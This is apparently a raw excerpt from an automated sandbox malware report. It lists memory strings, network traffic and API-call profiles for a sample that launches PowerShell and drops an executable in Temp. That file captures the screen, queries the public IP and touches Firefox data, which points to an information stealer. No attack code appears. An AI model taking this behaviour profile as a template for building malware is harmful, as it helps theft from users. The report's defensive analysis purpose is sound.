Source: 9RM52QaURq.exe, 00000000.00000002.3244715340.0000000003119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2415906158.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2415906158.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.2415906158.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2415287116.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2415906158.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: wbfTHB1mDB.exe, 00000008.00000002.2650409439.0000018C89C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: wbfTHB1mDB.exe, 00000008.00000002.2650409439.0000018C89C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgup
Source: wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587805685.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8810A000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587353384.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588183442.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588732327.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586959933.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586158436.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozc
Source: wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wbfTHB1mDB.exe, 00000008.00000003.2572951397.0000018C89CBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wbfTHB1mDB.exe, 00000008.00000003.2572951397.0000018C89CBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wbfTHB1mDB.exe, 00000008.00000003.2572951397.0000018C89CBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000003.00000002.2415906158.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2415287116.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8813E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.col.man3
Source: wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8810A000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000002.2649919587.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2602973119.0000018C8810C000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587353384.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588183442.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588732327.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586959933.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586158436.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000003.00000002.2418547237.0000000005B05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wbfTHB1mDB.exe, 00000008.00000003.2580302671.0000018C89D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: wbfTHB1mDB.exe, 00000008.00000003.2579925548.0000018C89D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: wbfTHB1mDB.exe, 00000008.00000003.2579925548.0000018C89D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: wbfTHB1mDB.exe, 00000008.00000003.2586557573.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587805685.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2585777502.0000018C8A731000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2599021059.0000018C8810A000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2587353384.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588183442.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2588732327.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586959933.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2586158436.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: wbfTHB1mDB.exe, 00000008.00000003.2581075084.0000018C8AF6B000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2580219555.0000018C881A9000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2579285076.0000018C89E4C000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2579735813.0000018C8A7CF000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2579285076.0000018C89DF8000.00000004.00000020.00020000.00000000.sdmp, wbfTHB1mDB.exe, 00000008.00000003.2579925548.0000018C89D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: wbfTHB1mDB.exe, 00000008.00000003.2580302671.0000018C89D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org#
Source: wbfTHB1mDB.exe, 00000008.00000003.2579925548.0000018C89D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: wbfTHB1mDB.exe, 00000008.00000003.2579925548.0000018C89D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: wbfTHB1mDB.exe, 00000008.00000003.2579925548.0000018C89D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: wbfTHB1mDB.exe, 00000008.00000003.2586158436.0000018C8810D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49924 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A8FB30 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SHCreateMemStream,SelectObject,DeleteDC,ReleaseDC,DeleteObject,EnterCriticalSection,LeaveCriticalSection,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

8_2_0000018C89A8FB30

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A93CF0 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,	8_2_0000018C89A93CF0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A943F0 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,	8_2_0000018C89A943F0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE2720 NtAllocateVirtualMemory,CoInitializeEx,CoTaskMemFree,	8_2_0000018C89AE2720
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE26C0 NtQueryObject,	8_2_0000018C89AE26C0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE26E0 NtAllocateVirtualMemory,	8_2_0000018C89AE26E0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A70415F0 NtQueryVirtualMemory,NtProtectVirtualMemory,	8_2_00007FF6A70415F0

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Code function: 0_2_0550D324	0_2_0550D324
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Code function: 0_2_075705E8	0_2_075705E8
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Code function: 0_2_075754A0	0_2_075754A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0463B770	3_2_0463B770
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0463B748	3_2_0463B748
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89ACE968	8_2_0000018C89ACE968
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A3F8B0	8_2_0000018C89A3F8B0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A4C8C0	8_2_0000018C89A4C8C0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AC98C0	8_2_0000018C89AC98C0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A4B820	8_2_0000018C89A4B820
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A90820	8_2_0000018C89A90820
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A8FB30	8_2_0000018C89A8FB30
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A98B70	8_2_0000018C89A98B70
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A4ACC0	8_2_0000018C89A4ACC0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A91FF0	8_2_0000018C89A91FF0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A4CF60	8_2_0000018C89A4CF60
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A88F60	8_2_0000018C89A88F60
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A3F1C0	8_2_0000018C89A3F1C0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A8F200	8_2_0000018C89A8F200
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AB114C	8_2_0000018C89AB114C
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A970B0	8_2_0000018C89A970B0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A71340	8_2_0000018C89A71340
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A522D0	8_2_0000018C89A522D0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A9C55A	8_2_0000018C89A9C55A
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA749C	8_2_0000018C89AA749C
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A9662B	8_2_0000018C89A9662B
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A91660	8_2_0000018C89A91660
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AB19B8	8_2_0000018C89AB19B8
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AB29F4	8_2_0000018C89AB29F4
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA4A00	8_2_0000018C89AA4A00
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A7C930	8_2_0000018C89A7C930
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A78950	8_2_0000018C89A78950
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A828C0	8_2_0000018C89A828C0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA088C	8_2_0000018C89AA088C
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA58D0	8_2_0000018C89AA58D0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A5C820	8_2_0000018C89A5C820
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A47B8D	8_2_0000018C89A47B8D
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A69A10	8_2_0000018C89A69A10
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A15DB0	8_2_0000018C89A15DB0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A7FDB0	8_2_0000018C89A7FDB0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA0D98	8_2_0000018C89AA0D98
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A16D20	8_2_0000018C89A16D20
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA2CD0	8_2_0000018C89AA2CD0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA8C34	8_2_0000018C89AA8C34
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A7CC50	8_2_0000018C89A7CC50
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A7CF70	8_2_0000018C89A7CF70
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AB9EA0	8_2_0000018C89AB9EA0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A3FEE0	8_2_0000018C89A3FEE0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A8AE50	8_2_0000018C89A8AE50
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A4A1F0	8_2_0000018C89A4A1F0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A801F0	8_2_0000018C89A801F0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A851E0	8_2_0000018C89A851E0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A46130	8_2_0000018C89A46130
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A5E130	8_2_0000018C89A5E130
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A16180	8_2_0000018C89A16180
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A49090	8_2_0000018C89A49090
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA5044	8_2_0000018C89AA5044
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A7F040	8_2_0000018C89A7F040
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA7060	8_2_0000018C89AA7060
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AB13C8	8_2_0000018C89AB13C8
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A943F0	8_2_0000018C89A943F0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A383D0	8_2_0000018C89A383D0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A5E320	8_2_0000018C89A5E320
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A7D2A0	8_2_0000018C89A7D2A0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A7C300	8_2_0000018C89A7C300
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89ACE2CC	8_2_0000018C89ACE2CC
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A402E0	8_2_0000018C89A402E0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A88230	8_2_0000018C89A88230
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A655B0	8_2_0000018C89A655B0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA45F8	8_2_0000018C89AA45F8
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A7C600	8_2_0000018C89A7C600
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A36510	8_2_0000018C89A36510
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A35520	8_2_0000018C89A35520
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A90500	8_2_0000018C89A90500
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AAF7F4	8_2_0000018C89AAF7F4
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AA47FC	8_2_0000018C89AA47FC
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A94740	8_2_0000018C89A94740
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A74710	8_2_0000018C89A74710
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A86760	8_2_0000018C89A86760
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A666A0	8_2_0000018C89A666A0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A806A6	8_2_0000018C89A806A6
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A586D0	8_2_0000018C89A586D0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A16610	8_2_0000018C89A16610
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A9B68A	8_2_0000018C89A9B68A
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7047FD0	8_2_00007FF6A7047FD0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A705D890	8_2_00007FF6A705D890
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A704E6F0	8_2_00007FF6A704E6F0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7053618	8_2_00007FF6A7053618
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A705B480	8_2_00007FF6A705B480
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7059510	8_2_00007FF6A7059510
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A705C296	8_2_00007FF6A705C296
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7052290	8_2_00007FF6A7052290
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A70592D0	8_2_00007FF6A70592D0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A705E2E0	8_2_00007FF6A705E2E0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7045140	8_2_00007FF6A7045140
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7047180	8_2_00007FF6A7047180
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A704C1B0	8_2_00007FF6A704C1B0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A706A1E8	8_2_00007FF6A706A1E8
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A705E1F2	8_2_00007FF6A705E1F2
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A704B220	8_2_00007FF6A704B220
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A705AF50	8_2_00007FF6A705AF50
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7059F70	8_2_00007FF6A7059F70
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7055F60	8_2_00007FF6A7055F60
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7046030	8_2_00007FF6A7046030
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7053EC7	8_2_00007FF6A7053EC7
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7046D40	8_2_00007FF6A7046D40
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A705DD60	8_2_00007FF6A705DD60
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A7045AB0	8_2_00007FF6A7045AB0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A704BAC0	8_2_00007FF6A704BAC0
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A70739D0	8_2_00007FF6A70739D0

Source: Joe Sandbox View

